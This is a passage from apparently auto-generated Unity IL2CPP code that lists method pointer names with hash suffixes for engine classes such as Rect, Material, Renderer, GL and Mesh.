Debug_IsLoggingEnabled_m0A0E57CCECE356C1468EAF53FE9EF19EBFF1BCD1,
Debug__cctor_m367B08F18665FE9E6E959914F170DD5E6BF0AC2C,
NULL,
NULL,
Bounds__ctor_mAF7B238B9FBF90C495E5D7951760085A93119C5A,
Bounds_GetHashCode_m59C79B529D33866FE45FEFC0C69FBD3B4AC7E172,
Bounds_Equals_m93E0B9D24C73E57A6FABB9D312101D48183C88CC,
Bounds_Equals_m615135524315743D29633C33B6C8B16B754266DB,
Bounds_get_center_m5B05F81CB835EB6DD8628FDA24B638F477984DC3,
Bounds_set_center_m891869DD5B1BEEE2D17907BBFB7EB79AAE44884B,
Bounds_get_size_m0699A53A55A78B3201D7270D6F338DFA91B6FAD4,
Bounds_set_size_m950CFB68CDD1BF409E770509A38B958E1AE68128,
Bounds_get_extents_mFE6DC407FCE2341BE2C750CB554055D211281D25,
Bounds_set_extents_m09496358547B86A93EFE7BE6371E7A6FE937C46F,
Bounds_get_min_m465AC9BBE1DE5D8E8AD95AC19B9899068FEEBB13,
Bounds_get_max_m6446F2AB97C1E57CA89467B9DE52D4EB61F1CB09,
Bounds_op_Equality_m8DFE70F630E5BB54FC9E14814F2A3991F2468510,
Bounds_op_Inequality_mCA10789889154806602C77822FA041863EBE4147,
Bounds_SetMinMax_mB5F7DDF18EDB7F3F25FA6D2B36824F28978C540F,
Bounds_Encapsulate_m1FCA57C58536ADB67B85A703470C6F5BFB837C2F,
Bounds_Encapsulate_m7C70C382B9380A8C962074C78E189B53CE8F7A22,
Bounds_ToString_m1BCCCC8C6455A77DE5C964968C33305EF7A4A0D2,
Bounds_ToString_m085531A8E800327829FCD48DEA671A4A0B8D21CA,
Plane_get_normal_mA161D94E6F7327BC111007C880B76E1731729EFB,
Plane__ctor_m2BFB65EBFF51123791878684ECC375B99FAD10A2,
Plane_Raycast_mC6D25A732413A2694A75CB0F2F9E75DEDDA117F0,
Plane_ToString_mF0A98DAF2E4FA36A98B68F015A4DE507D8BB3B5A,
Plane_ToString_mE12B74C757E52A84BE921DF2E758A36E97A11DDA,
Ray__ctor_mE298992FD10A3894C38373198385F345C58BD64C,
Ray_get_origin_m97604A8F180316A410DCD77B7D74D04522FA1BA6,
Ray_get_direction_m21C2D22D3BD4A683BD4DC191AB22DD05F5EC2086,
Ray_GetPoint_mAF4E1D38026156E6434EF2BED2420ED5236392AF,
Ray_ToString_m06274331D92120539B4C6E0D3747EE620DB468E5,
Ray_ToString_mA76F7B86876505F674F3E20C18C8258103622C10,
Rect__ctor_m18C3033D135097BEE424AAA68D91C706D2647F23,
Rect__ctor_m503705FE0E4E413041E3CE7F09270489F401C675,
Rect__ctor_m5665723DD0443E990EA203A54451B2BB324D8224,
Rect_get_zero_mBA92EC8F405CC95A0F1ED05E66D9ABD3A61B7476,
Rect_MinMaxRect_m6B16D975ED1728067570E5FAF474B430EC1F6430,
Rect_get_x_mB267B718E0D067F2BAE31BA477647FBF964916EB,
Rect_set_x_mAB91AB71898A20762BC66FD0723C4C739C4C3406,
Rect_get_y_mC733E8D49F3CE21B2A3D40A1B72D687F22C97F49,
Rect_set_y_mDE91F4B98A6E8623EFB1250FF6526D5DB5855629,
Rect_get_position_m9B7E583E67443B6F4280A676E644BB0B9E7C4E38,
Rect_set_position_m9CD8AA25A83A7A893429C0ED56C36641202C3F05,
Rect_get_center_mAA9A2E1F058B2C9F58E13CC4822F789F42975E5C,
Rect_set_center_m1BFC7584EEE9EF6C9AC2CA8459300FE23D5CE86F,
Rect_get_min_mD0D1BABF9C955D2D9CCA86E257B0783ACDEE69AC,
Rect_set_min_m6557D7D73C6F115CA7C92E38C88EA9E95FC89253,
Rect_get_max_m60149158D9A01113214BB417AA48CEF774899167,
Rect_set_max_mAD2D6D5DC1F5A6E69A0A0BD7E34C209F91C381F0,
Rect_get_width_m620D67551372073C9C32C4C4624C2A5713F7F9A9,
Rect_set_width_m93B6217CF3EFF89F9B0C81F34D7345DE90B93E5A,
Rect_get_height_mE1AA6C6C725CCD2D317BD2157396D3CF7D47C9D8,
Rect_set_height_mD00038E6E06637137A5626CA8CD421924005BF03,
Rect_get_size_mFB990FFC0FE0152179C8C74A59E4AC258CB44267,
Rect_set_size_m346E4F7077E5A1C0F4E21966232CD726CB9E6BAA,
Rect_get_xMin_mE89C40702926D016A633399E20DB9501E251630D,
Rect_set_xMin_mA873FCFAF9EABA46A026B73CA045192DF1946F19,
Rect_get_yMin_mB19848FB25DE61EDF958F7A22CFDD86DE103062F,
Rect_set_yMin_m9F780E509B9215A9E5826178CF664BD0E486D4EE,
Rect_get_xMax_m2339C7D2FCDA98A9B007F815F6E2059BA6BE425F,
Rect_set_xMax_m97C28D468455A6D19325D0D862E80A093240D49D,
Rect_get_yMax_mBC37BEE1CD632AADD8B9EAF9FE3BA143F79CAF8E,
Rect_set_yMax_mCF452040E0068A4B3CB15994C0B4B6AD4D78E04B,
Rect_Contains_mAB270D6B7E3B0009A50D142C569D63E8FE59F48B,
Rect_Contains_mB1160CD465F3E9616AA4EED72AFFD611BD8D2B6B,
Rect_OrderMinMax_m8E6ADD1C9B8B762FAAEA7D9C2CD72A0A57DEAAE9,
Rect_Overlaps_m5A540A24DAD3327006A3A2E209CC17992173B572,
Rect_Overlaps_m3F0BA2C8BB81491978B21EB21C8A6D3BBED02E41,
Rect_op_Inequality_m4698BE8DFFC2C4F79B03116FC33FE1BE823A8945,
Rect_op_Equality_m3592AA7AF3B2C809AAB02110B166B9A6F9263AD8,
Rect_GetHashCode_m8E55539476EA6B7A6E0CEC5F980227CD15B778F1,
Rect_Equals_mD7EB2046512E4A46524A7ED929F1C38A32C408F8,
Rect_Equals_mE725DE506D3F1DB92F58B876BDA42AACD4D991B5,
Rect_ToString_m7BF74645745862DA4751965D0899F94376F77F10,
Rect_ToString_mA9EB8EC6A2E940240E0D0ECFA103B9B7EFB3D532,
RectInt_get_x_mA1E7EF6DEAD2E900D7D56B7A3957C05081EBA9CA,
RectInt_set_x_m2D2F3A87E9899A29444DBDD0BB11CB19F13AA075,
RectInt_get_y_m440422264E6FCAA91E01F81486A78037AC29D878,
RectInt_set_y_m45D5C1D817698266BED66D41A705956A1571858D,
RectInt_get_width_m6B7B2FB764EAE83B7F63E7F77FA33973606761A7,
RectInt_set_width_mCD96AA9D096114147F8411A340CE4AD3476DCD4C,
RectInt_get_height_mE25FB938714942D7A3BA0B3C21BC5CB913D5709C,
RectInt_set_height_m823A353A80B8B5180AEDF968A6E85B9D9B75C1C6,
RectInt_get_xMin_mA5FB5AF1133380E080CF750D21327DE27EADEE1B,
RectInt_get_yMin_m6914C2254158DF797E20E381626DC08A2700147B,
RectInt_get_xMax_mBA05CE52847E3D3CB8295055706B3E0D4350E9F0,
RectInt_get_yMax_mAE5D758A1241F7722F8FB9B46861583F76C8FE44,
RectInt__ctor_m6E8B3A6C7EE11257A6B438E36274116FE39B5B42,
RectInt_Overlaps_m9E82E1C8BFDA3297221E5FDC8B8773AD3F50C4EE,
RectInt_ToString_m7EC8BB4830459B8CF5BF3032E9A526A6EE18D386,
RectInt_ToString_m7EAE8CA8D77B7D6DDD46B61D670C71046006B92F,
RectInt_Equals_mE9EA164664CA30C1C099EFB658D691F55A793B96,
RectOffset__ctor_m7DB8E8EDDB814824299F9EF661DAFA32854F0CC9,
RectOffset__ctor_m0711AF5DF27B8F3EC6CAF54755CDE46B76C00DBE,
RectOffset_Finalize_mF43E63CF652D658B255D033A099CAED2C4262FBC,
RectOffset_ToString_m8FAEA1A73C37F5827D0444EB4A8C5BA0781506F8,
RectOffset_ToString_mEE066023D51F743F0370E3547E7145FAE86B00BC,
RectOffset_Destroy_mFFB78BB790E3BAFE464C29DB5F396FB2FA8E6E70,
RectOffset_InternalCreate_mCD8BEFDA09D5AF79BE01F71D4E92DFFF9064D88E,
RectOffset_InternalDestroy_mF7D4125E6EED1E2CCDD563FA72EFDF800BC548F4,
RectOffset_get_left_mA406D7AFF76E48507EF143CDB1D157C4D5430D90,
RectOffset_set_left_mEE36418FAC0A5C5AA4A1C886C7CFF5D35AFAD2C0,
RectOffset_get_right_m07C826B0BC79B0CBC01F5FF489D456C553F047BF,
RectOffset_set_right_m6D3608E0973F68CC0D0A6A9863D31D70972A9588,
RectOffset_get_top_m82E49FB93A5BD417131136F5A7DBA0F251F10263,
RectOffset_set_top_mEF389A8923A33EC2927AD13ADE00D960D4593207,
RectOffset_get_bottom_mDF9C1EC125F94245D5532C34FCFB65BE0F2A9D0B,
RectOffset_set_bottom_mB303CE31F9932C3BE8A3FD48E5049D624F395C83,
RectOffset_get_horizontal_m5C1795C027E4987A8532DC27D88FB3B9FFEC1352,
RectOffset_get_vertical_m43E46D9F313BB617044184A65350E6498A0709F0,
RectOffset_Remove_mC21D85A2BA4D0246FEC0B6C5F3C2D293CD41DB3D,
RectOffset_Remove_Injected_mEEE12EFCC02FDB71A8A65AF7A52EBD649968C2B0,
LightingSettings_LightingSettingsDontStripMe_mA06509B760BA1A7DDB4CC3CE584DC2C3E1FE0237,
Gizmos_DrawLine_m09F46DC2EA3C2200E465435A29960E8BCD84DD9C,
Gizmos_DrawCube_mE7D2162786517A14E8A740C7887CD08A3105B192,
Gizmos_get_color_m47531920945B28B9338BC52BD651D56629D1E453,
Gizmos_set_color_mFD4A7935FF025F5922374A8DD797BA0558BF1AD2,
Gizmos_set_matrix_m916F9A7A8ACC51F304BB5BB4536854A045EF844B,
Gizmos_DrawLine_Injected_mE5B3A0C9CAC003CA26C89CB592CCB1DBD93ABCB4,
Gizmos_DrawCube_Injected_m77497D5FECD9ECA4120B61EFC99E0578772C12AB,
Gizmos_get_color_Injected_m0067722BEA8E8003D9734859604031CC8B103F37,
Gizmos_set_color_Injected_m59A68156761584DF716824D898C0F86CDAFE85CD,
Gizmos_set_matrix_Injected_mB7E97361A6DA3EA60DB077BB4C604FB510E395E8,
BeforeRenderOrderAttribute_get_order_m70EDC4881AB025647CF1F01D8733F05097C05E29,
BeforeRenderOrderAttribute_set_order_m3E4622CC00044C92D13296978F2429FD080617B9,
BeforeRenderOrderAttribute__ctor_mE8C92CA40D3B767DCBFEE8B1576835DB5D4D21D4,
BeforeRenderHelper_GetUpdateOrder_mB4F29275F82F37A4D17F5C4243584685C5A66936,
BeforeRenderHelper_RegisterCallback_m0C8CA4002EA46C819119E4680A78353A95D9A24B,
BeforeRenderHelper_UnregisterCallback_m9E62642B0D26B57DDB7B6F7A354D5EC8CA2BB4F7,
BeforeRenderHelper_Invoke_m3CF1B83F9AA30342B05FB6F38B7909338B81C3F8,
BeforeRenderHelper__cctor_mBB49EB68D5775626D48EBD2C1321D10C7C47503C,
CustomRenderTextureManager_InvokeOnTextureLoaded_Internal_mF37BA06B50C53980AB49E0199E88BE7EF7FD5FF6,
CustomRenderTextureManager_InvokeOnTextureUnloaded_Internal_m32EC14ACA09D2282C0920DB026C35D4F4D1EDA1D,
Display__ctor_mD4B0D1F494D3472058E47A940600FAC93D68D1DF,
Display__ctor_m0F78D1B697F3D82FFD274A6AA716E96FA6A4B156,
Display_get_renderingWidth_mD23656E7A8270AF79B0EF4124959B3E18BEDF0C7,
Display_get_renderingHeight_m0627691B7B2D7037A856597E43BFDF1F0CC2B0B8,
Display_get_systemWidth_m515BF32963F049A9710F11CE8F6445BAA63D7155,
Display_get_systemHeight_mC20ADD124FBEF94796F736684A3AF4D0AA569FC7,
Display_RelativeMouseAt_m978A03E5176C10A4A5CD1DEE6088FF7C3FE6EBBF,
Display_get_main_m26EA95D6D963F024FE40479B466A2A965C872C08,
Display_RecreateDisplayList_mF33136978BFBD52AA140020D042C9F9842DD1225,
Display_FireDisplaysUpdated_mF4A8B268D515EE547EFF9D7C82D5DF24E9F01335,
Display_GetSystemExtImpl_m349658ADE841804EEDC544B9F953A69906CF77A2,
Display_GetRenderingExtImpl_m8449507E75D946208BF6ACADDF0D31DA28810BBE,
Display_RelativeMouseAtImpl_m3935729A661E4480F22E6601FCBB9CB3FD5E055F,
Display__cctor_m1C213E7E81797389DA1B6DEFA6E8D884D8904F36,
DisplaysUpdatedDelegate__ctor_mCF8A6ABE7CCC32908022E0AB13ED3BF1EBD2719D,
DisplaysUpdatedDelegate_Invoke_m4E0A3493E2C3A9CE0D5B5B3FD40A8389BFBA1853,
Screen_get_width_mCA5D955A53CF6D29C8C7118D517D0FC84AE8056C,
Screen_get_height_m624DD2D53F34087064E3B9D09AC2207DB4E86CA8,
Screen_get_dpi_mD5BB95E605FABD335F0D4736EE4860A0AA98A50D,
Screen_GetScreenOrientation_mBC2B37244D3EEAF6C1892EFC20EF70B1A2B583A3,
Screen_get_orientation_m7B47A2719DDE296357BB3199AB3BECC49F9F4A6D,
Screen_get_fullScreenMode_m9651FE8CD208A00D617869E4CAB43607AD9FA23D,
Graphics_Internal_GetMaxDrawMeshInstanceCount_m5CC9F58628E50EDDFBE2BFB4AA1575A3DE3B8F50,
Graphics_Internal_SetNullRT_m90451387CC2DFCC7E980490CE95AEFD39125C26C,
Graphics_Internal_SetRTSimple_m779C3154F1B58E2D0D21D4C2581EA995FDFB2645,
Graphics_Internal_DrawTexture_m62C76541D5AB3EC902860463D1F43FA44862E296,
Graphics_SetRenderTargetImpl_m5C1AED9F0899EA1E3ADC8E603C33C40C18F068CB,
Graphics_SetRenderTargetImpl_m8EF3E3715EE1BC29C43582B5ADF3113A9DD924AB,
Graphics_SetRenderTarget_m4694FD3731085B938B250B221EC16FB819180508,
Graphics_SetRenderTarget_mDA2F41245400E50551268368F6C551FFFDCC9CAC,
Graphics__cctor_m5475D3DC1FFB320D807D63A44D5B69150811ED7D,
Graphics_Internal_SetRTSimple_Injected_m3EA42AD141410129D9229427AA0B4B94B18C2BA2,
GL_Vertex3_m9FFEDAB32CC9A54F1BF7572D0CE856AE41A6473F,
GL_Vertex_m343A1E85A377F4107C5A9BDDBBF1D3E181997C59,
GL_TexCoord3_m34D6FE6E9AFF2A1DC7F0DA57DF386AEB58C59DAA,
GL_TexCoord2_m53885A6C83E3B67A8B06D30D595267BC07231339,
GL_ImmediateColor_mAB5F99894E5FC32F9FC0613215C9E5EE54628771,
GL_Color_mF6C9058C9552C5E26A15FBB7061BEB5E78C7D3D8,
GL_SetViewMatrix_m9175011F5A2A5C2D14BEC0049DDB4CC5F1AA7225,
GL_set_modelview_mEBE03EB4470FB1A9DAFB7992099BBC45D711968D,
GL_PushMatrix_m16E696D17AE7C402C63C1C9068E5405C4B37C16C,
GL_PopMatrix_m4AF6773C7BF85E8EEEC5CF36D5AFCCAC0FA34531,
GL_LoadOrtho_m0690AE9736A807C9D662FDB9D9A58CC5D6ECA510,
GL_LoadPixelMatrix_mFF4AF040DE14CAE70A84D42BFEE0DB6866E89B46,
GL_LoadProjectionMatrix_m50BB4BC12EC636964C60C0DBBC4D5777706B00E4,
GL_GLLoadPixelMatrixScript_mCD2CBCC79E798959B19A399DD6A10359ADEEE1EE,
GL_LoadPixelMatrix_m4E6F7BAFD87A2FE91048B0F602519811690CAA63,
GL_GLIssuePluginEvent_mA86C1C8B50DA232120C3BF0BD26EC283C1FB62C0,
GL_IssuePluginEvent_m6F9EC530F81DC4DB91A09B4F9F730B013C6929EF,
GL_Begin_m484E517466FBE5D4AE78DAC608E403159A57BD10,
GL_End_m804EE4091F69FC2F6B764371D327CFCB28884550,
GL_GLClear_mBFB93D93631651C66CE066CCE714A0D830742668,
GL_Clear_mD748D5A6771761276FC9D2575A6873E51F90EA98,
GL_Viewport_mEB02BD765EBA8B3474864D735DDD1FEB74609D9F,
GL_SetViewMatrix_Injected_m390ED4CAD334BC81308B43D30E822E814C566522,
GL_LoadProjectionMatrix_Injected_m99895E48BE777AEA2ED4F0926FBCEBB2E588E57F,
GL_GLClear_Injected_m340FE5EB95332F578B9E51842A10D20B54062E29,
GL_Viewport_Injected_mE3F29CE821CC6AE7DBCE7CCC7623809C59F9E8EF,
LightProbes_Internal_CallTetrahedralizationCompletedFunction_m8C1C2DCD3865A746E9526BDDD27B1B0A0FD09B57,
LightProbes_Internal_CallNeedsRetetrahedralizationFunction_m34576D62441FB37083D1664E32E3756900CF183C,
Resolution_ToString_m058CE120CC83F314D0C8D4A706F9AA068BC9CF34,
QualitySettings_get_vSyncCount_m623B92EE9CBB51A7A96CA88022319CC46CC02F24,
QualitySettings_set_vSyncCount_m37CB89BA3DF4BE2E181339F5F44F03C493733360,
QualitySettings_get_activeColorSpace_m7BD95E037EC83AD498617F7906B41932CE33288B,
LineRenderer_get_widthMultiplier_m8238A8640520DD38DAE4DF00D227C1328A8550C3,
LineRenderer_set_widthMultiplier_mB1B825C2AAE0BB5F05431DEDAC5856EF27478255,
LineRenderer_set_startColor_mF72FAB20C09372FC8F2CBFCBD837FA02A87FBA91,
LineRenderer_set_endColor_m6AF26E0174434828BC6EF1BAC1FE188084819D9D,
LineRenderer_set_positionCount_m2001FB4044053895ECBE897AB833284F3300B205,
LineRenderer_SetPosition_m84C4AD9ADC6AC62B33DB4D7E4C9F066DFF8440C1,
LineRenderer_set_startColor_Injected_mF6589CABC27AAEB4F8F98D20F9248A6EDD7CDA52,
LineRenderer_set_endColor_Injected_mF740E500F675A675C7F92BD2100336D0ED0F2691,
LineRenderer_SetPosition_Injected_m27450601152034E046A3181A374382A0DE636682,
MaterialPropertyBlock_SetFloatImpl_m65B3A7B090CDD9E32BA6D85637C37980C1D38DE8,
MaterialPropertyBlock_SetVectorImpl_mA91796B91A33617D2BDFEC33612A7C595011CAC1,
MaterialPropertyBlock_SetColorImpl_mCE88355D90601D10E0527BFC1B40F0A1433059C0,
MaterialPropertyBlock_SetTextureImpl_m4F16E63E86A344A8FB595BBD7132641593427F95,
MaterialPropertyBlock_SetVectorArrayImpl_mFED50BE8138077759CB79FF448A7AD9B4F27D981,
MaterialPropertyBlock_CreateImpl_m98E2714F72E720074AED038F85E0ACB00C8FBC16,
MaterialPropertyBlock_DestroyImpl_mC98A3C8791C2EC057A570F64F7E6F43AB7D34F05,
MaterialPropertyBlock_Clear_m18CD90F6F18294A59C408FFCCC8F6F5EE204E6D4,
MaterialPropertyBlock_Clear_m83CE1CC476A80F162FC89DBF6C2C78659B6E1253,
MaterialPropertyBlock_SetVectorArray_m92BE44069E96A65D975F989B9C2703819B4D9709,
MaterialPropertyBlock__ctor_m14C3432585F7BB65028BCD64A0FD6607A1B490FB,
MaterialPropertyBlock_Finalize_m39FFB2D5E0348431D63EE94E263032CA6C7040BF,
MaterialPropertyBlock_Dispose_m4D2F96068928FBC127E3A48B45DB5F3C0022B3E3,
MaterialPropertyBlock_SetFloat_m6BA8DA03FAD1ABA0BD339E0E5157C4DF3C987267,
MaterialPropertyBlock_SetVector_m22B010D99231EF5684063F4A07F5948854D590B3,
MaterialPropertyBlock_SetColor_m5B4E910B5E42518BBD0088055EB68E4A3A609DDE,
MaterialPropertyBlock_SetTexture_m39F531D3F35D6C5B661A7B4F07DD7B8ACC22627F,
MaterialPropertyBlock_SetVectorArray_m5C0A3017A7EA9EE5F01295E346EA72D70A8BD682,
MaterialPropertyBlock_SetVectorImpl_Injected_m3F860A6FF7908C66A89B280CE69E57D1CFB64875,
MaterialPropertyBlock_SetColorImpl_Injected_m48FC0ED590321DA73DA5BEC25ACD81003F58216A,
Renderer_GetMaterial_m890C1B7FAA74CFC4B362EE3E8E61F6778D0EA189,
Renderer_GetSharedMaterial_mD825E40750BD40B66D0A9FE4C283040E516FF192,
Renderer_SetMaterial_mD7F173BF5941C840EB5A24FEF8B7BC3BAFAF7CCA,
Renderer_GetMaterialArray_m27C05A258B1D2A7EA7A77FFE57929B7A0EDB2AF9,
Renderer_Internal_SetPropertyBlock_m53DA7BACEEF0CFD23E6C2C2675E7A205388A68CF,
Renderer_Internal_GetPropertyBlock_mAD37BD3873CDEE8C5BFD367677CD30F7BDAD4589,
Renderer_SetPropertyBlock_mF565698782FE54580B17CC0BFF9B0C4F0D68DF50,
Renderer_GetPropertyBlock_mD062F90343D70151CA060AE7EBEF2E85146A9FBA,
Renderer_get_enabled_mFDDF363859AEC88105A925FA7EA341C077B09B54,
Renderer_set_enabled_m015E6D7B825528A31182F267234CC6A925F71DA8,
Renderer_set_shadowCastingMode_mB0CD3D153E43044388AEFF7AEFDA93E80EB36D11,
Renderer_set_receiveShadows_mABEB4C72E96E65117B7FFFD4180247565D0C1A09,
Renderer_get_sortingLayerID_m3D7AE74F1B87099810CF969CB4520C85F9AE5F92,
Renderer_set_sortingLayerID_m289E44FD06B6692C7B2ADD1189FE4FC013180C49,
Renderer_get_sortingOrder_m4CE7ADEEC8E2F28CC1D10B1D4091A10F8F1583FA,
Renderer_set_sortingOrder_m4C67F002AD68CA0D55D20D6B78CDED3DB24467DA,
Renderer_get_materials_m43D33328432700524EAEAB093C67AE5689976118,
Renderer_get_material_m5BA2A00816C4CC66580D4B2E409CF10718C15656,
Renderer_get_sharedMaterial_mA2E0CA0A564617FFC3E0E50947C6300082C35F81,
Renderer_set_sharedMaterial_m5E842F9A06CFB7B77656EB319881CB4B3E8E4288,
Shader_Find_mFF2A8FC042B9CFAA9800679CA674D52859BF3A72,
Shader_TagToID_m1FD312CA7913C007B8A80F638C3DCD24B5E47323,
Shader_PropertyToID_mF5F7BA2EFF23D83482ECDE4C34227145D817B1EB,
Shader__ctor_m2BD5A93728781AEF4DCA08F3BCC93C0A62B864C1,
Material_CreateWithShader_m612CA74B5ECE867532F304FC23E0B96B584C4538,
Material_CreateWithMaterial_m520BA35C446CE25C45784F18D882A02B5D3B215E,
Material_CreateWithString_m68659922AE0E29B3ED44C9262FF2FA381E5EFA87,
Material__ctor_m7FDF47105D66D19591BE505A0C42B0F90D88C9BF,
Material__ctor_mFCC42FB90257F1E8F7516A8640A79C465A39961C,
Material__ctor_mF1676C2EE42E6BCE74AC3C90E207A35E515D1FD8,
Material_get_color_mA4B7D4B96200D9D8B4F36BF19957E9DA81071DBB,
Material_set_color_m5C32DEBB215FF9EE35E7B575297D8C2F29CC2A2D,
Material_get_mainTexture_mC6C6B860B44321F0342AEFA0DD7702384334F37D,
Material_GetFirstPropertyNameIdByAttribute_mCBB72749633F7B8A879D33F0B34DB4F54F8C2439,
Material_HasProperty_m52E2D3BC3049B8B228149E023CD73C34B05A5222,
Material_HasProperty_mC09A83B44E368A217F606DD4954FA080CC03EC6C,
Material_set_renderQueue_mFBB72A781DCCF0D4B85670B597788EC2D02D1C14,
Material_EnableKeyword_mE8523EF6CF694284DF976D47ADEDE9363A1174AC,
Material_DisableKeyword_mC123927EBF2F2A19220A4456C8EA19F2BA416E8C,
Material_IsKeywordEnabled_m95EDB12868EBE7F404755CB79E5958B7DFA342D0,
Material_get_passCount_m7BA071AFFA34DC3E49B56A16CB8B098566BDE765,
Material_GetTagImpl_m0A15070E738DE3834BEDD9D1634C498B5B744C2B,
Material_GetTag_m0B37070270E231B88808DB1B3F9EF4C1851627D4,
Material_SetPass_mBB03542DFF4FAEADFCED332009F9D61B6DED75FE,
Material_CopyPropertiesFromMaterial_m4148227E6A0B8E66315D8115F656B7F8BEAE915B,
Material_GetShaderKeywords_mEEE6AA1A327A7D63B8CD31306B70AAED6F7B7456,
Material_SetShaderKeywords_mB0751FC936E7546A20DD6531B52E3B0EAF5BB3A8,
Material_get_shaderKeywords_m11982F09EED6BB0A892342E1A72AEA470C44B105,
Material_set_shaderKeywords_mD650CF82B2DBB75F001E373E2E1ACA30876F3AB8,
Material_ComputeCRC_m5F743B7178F5E474A8FE15E5C0B1A6527E6E3A77,
Material_SetFloatImpl_m78678CE6EBB67BA3E9D58AD37CE3BDA3789F43AB,
Material_SetColorImpl_mC2AF99ED12166A5219C0E8B79D0D17C0FCFC0E3D,
Material_SetMatrixImpl_m634CD43159467FE20FF3860B5F9848101A9B0CE3,
Material_SetTextureImpl_mC5772481EBD0F0A488C564B424446514DF34CBD9,
Material_GetFloatImpl_m39798817949E201E1CF85DBBD416C746F3D64794,
Material_GetColorImpl_m44455DBA8C6391B5638D11934B8E4CC0713B4EFF,
Material_GetTextureImpl_m0363E7A333009D2FBEEBA51FC5D6E219563FF288,
Material_SetFloat_m879CF81D740BAE6F23C9822400679F4D16365836,
Material_SetFloat_m3ECFD92072347A8620254F014865984FA68211A8,
Material_SetColor_mFAB32FAA44461E46FD707B34184EC080CBB3539F,
Material_SetColor_m573C88F2FB1B5A978C53A197B414F9E9C6AC5B9A,
Material_SetVector_m44CD02D4555E2AF391C30700F0AEC36BA04CFEA7,
Material_SetMatrix_m668579C6402F88BFEF769D39E484BAD4CE6B0067,
Material_SetTexture_mA9F8461850AAB88F992E9C6FA6F24C2E050B83FD,
Material_GetFloat_m2A77F10E6AA13EA3FA56166EFEA897115A14FA5A,
Material_GetFloat_m52462F4AEDE20758BFB592B11DE83A79D2774932,
Material_GetColor_mAC702C70081A597DD2AA2F4627B1A1C65DDF6609,
Material_GetColor_mCCC62F29234C5D2D9B19EE2D7DA46A4573AFA765,
Material_GetVector_mFE0366FDCB87331910BCE5E234030C20A25484A2,
Material_GetTexture_mBA07A377A7DDD29CD53E6F687DE6D49A42C0C719,
Material_GetTexture_mE5D02B13E7AF35ABAE4FFC49E69FAF8F36F91191,
Material_SetColorImpl_Injected_m7AF196BB00E62E5B47067FD643740884C692694A,
Material_SetMatrixImpl_Injected_m982E0183155834D0018A8A0174DBE0536F56D49E,
Material_GetColorImpl_Injected_mC524E0342AAF07A17E22CDBA0FAA0BAC0689CED4,
Light_get_type_m0D12CD1E54E010DC401F7371731D593DEF62D1C7,
Light_get_spotAngle_m28B2CD7ADE25422693E7B1FA23E8615E9D7098FC,
Light_get_color_mE7EB8F11BF394877B50A2F335627441889ADE536,
Light_get_intensity_m8FA28D515853068A93FA68B2148809BBEE4E710F,
Light_set_intensity_mE4820C7F39F490B92ED5EA0C3AADA7C0775BE854,
Light_get_bounceIntensity_m535008F539A0EF22BBB831113EC34F20D6331FAE,
Light_get_range_m4156F07BA6CD289DA47080B590D632721D975A22,
Light_get_bakingOutput_mF383DB97CFD32D65DA468329E18DD2DD61521CED,
Light_get_shadows_m1A11721F202C27838A7A8ED72455E6A727CEE6C5,
Light_get_cookieSize_m1BB417985207915659198F63CF825A23A8ED30B0,
Light_get_cookie_m44A0C4B92F6CD6F2F8536A91C51B77FEEF59715E,
Light_get_color_Injected_m7B1E67B800788DF5DAF6C3114CBACA3B029A900A,
Light_get_bakingOutput_Injected_m587C60162C878716DF9310258756C2F587E35185,
MeshFilter_DontStripMeshFilter_m91485EC5EAB0DFED85197CF48DB2DD5C872695AC,
MeshFilter_get_sharedMesh_mE4ED3E7E31C1DE5097E4980DA996E620F7D7CB8C,
MeshFilter_set_sharedMesh_m946F7E3F583761982642BDA4753784AF1DF6E16F,
MeshFilter_get_mesh_m13172D7EF6682861971817D0A47EE2BE49FBCB1C,
MeshRenderer_DontStripMeshRenderer_m6AA14C7B8A41C6BBCDE33338AAB96239048192A1,
Mesh_Internal_Create_m0CB60738992BB5DFEE6A8E210DBEC5D21B499AD7,
Mesh__ctor_m5A9AECEDDAFFD84811ED8928012BDE97A9CEBD00,
Mesh_GetIndicesImpl_m2A93DF68D761B4F7559A40617C41B543535B8739,
Mesh_SetIndicesImpl_m8C51773B1B4F164E4A9EAE3A8A90D73319595B89,
Mesh_SetIndicesNativeArrayImpl_mFE8E16A329DB9A024263920C2A5FC3287A42E93D,
Mesh_PrintErrorCantAccessChannel_mD80AC1870BC51714BE0C97B15D3E3D4EC42AC85E,
Mesh_HasVertexAttribute_m6FA9574E4DEE19158535F93281791AD6FB550595,
Mesh_SetArrayForChannelImpl_mB6E87CFC14E1C7F12A921A2EB90004DC0108BE3C,
Mesh_SetNativeArrayForChannelImpl_mC0768D36A195AA3F802BBEE1E9681293156F3059,
Mesh_GetAllocArrayFromChannelImpl_m30C7972CA5A67CD01EBBDDE2FD8F48CE2F8F86F6,
Mesh_GetArrayFromChannelImpl_mBCA166B62E25425D987638F2B4876613D113E66E,
Mesh_get_canAccess_m97F255BBB8C009D643920E2D095B6DB8868E3572,
Mesh_get_vertexCount_mB7BE0340AAF272933068D830C8E711FC8978E12C,
Mesh_get_subMeshCount_mC0141293D0F339D8D721CCA2612B32E6FD7E3F8B,
Mesh_get_bounds_m9E3A46226824676703990270A722A89A4860A100,
Mesh_set_bounds_m2E526E9B61ACA77D644C22A9D8EB49583012B54E,
Mesh_ClearImpl_m671C073131284D65405DE7480536EE16A2815A62,
Mesh_RecalculateBoundsImpl_m33B65339F18DE70FDB0914F466281CDC39CAE5C2,
Mesh_RecalculateNormalsImpl_m87F16BA219482F6BF7B9E549291A2159C5625075,
Mesh_MarkDynamicImpl_m989606245279A69A710361DC0443BE39960DF857,
Mesh_GetUVChannel_mED19A64A1C824E8AC1505CF3EEFD797A22A31FD4,
Mesh_DefaultDimensionForChannel_m982B3DA65DC94227BB91893B957C56B9CAFC7F9A,
NULL,
NULL,
Mesh_SetSizedArrayForChannel_mBF8A0B7A6E58552C4142CD22FF31E7A0E125EC93,
Mesh_SetSizedNativeArrayForChannel_m6571CA632A3B7D9F2D110B5F76D47652A8B81372,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
Mesh_get_vertices_mA3577F1B08EDDD54E26AEB3F8FFE4EC247D2ABB9,
Mesh_set_vertices_m5BB814D89E9ACA00DBF19F7D8E22CB73AC73FE5C,
Mesh_get_normals_m2B6B159B799E6E235EA651FCAB2E18EE5B18ED62,
Mesh_set_normals_m85D73193C49211BE9FA135FF72D5749B16A4760B,
Mesh_get_tangents_mEA6C7BF6A2B9A8BD0E9A62963E048F973878299E,
Mesh_set_tangents_mF547B7E4F9C70FB7CD6168139180A70AD306169B,
Mesh_set_uv_m6ED9C50E0DA8166DD48AC40FD6C828B9AD2E9617,
